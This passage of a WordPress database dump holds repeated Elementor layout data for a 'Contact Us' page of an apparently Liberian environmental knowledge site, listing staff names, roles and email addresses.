href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14754,2340,'_elementor_edit_mode','builder'),(14755,2340,'_elementor_template_type','wp-page'),(14756,2340,'_elementor_version','2.7.5'),(14757,2340,'_wp_page_template','default'),(14758,2340,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\n\\nGIS Coordinator<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n\\nMarketing and Forest Forecast \\n\\n<a href=\\\"mailto:Kamara.ed14@gmail.com\\\">Kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14760,2341,'_elementor_edit_mode','builder'),(14761,2341,'_elementor_template_type','wp-page'),(14762,2341,'_elementor_version','2.7.5'),(14763,2341,'_wp_page_template','default'),(14764,2341,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_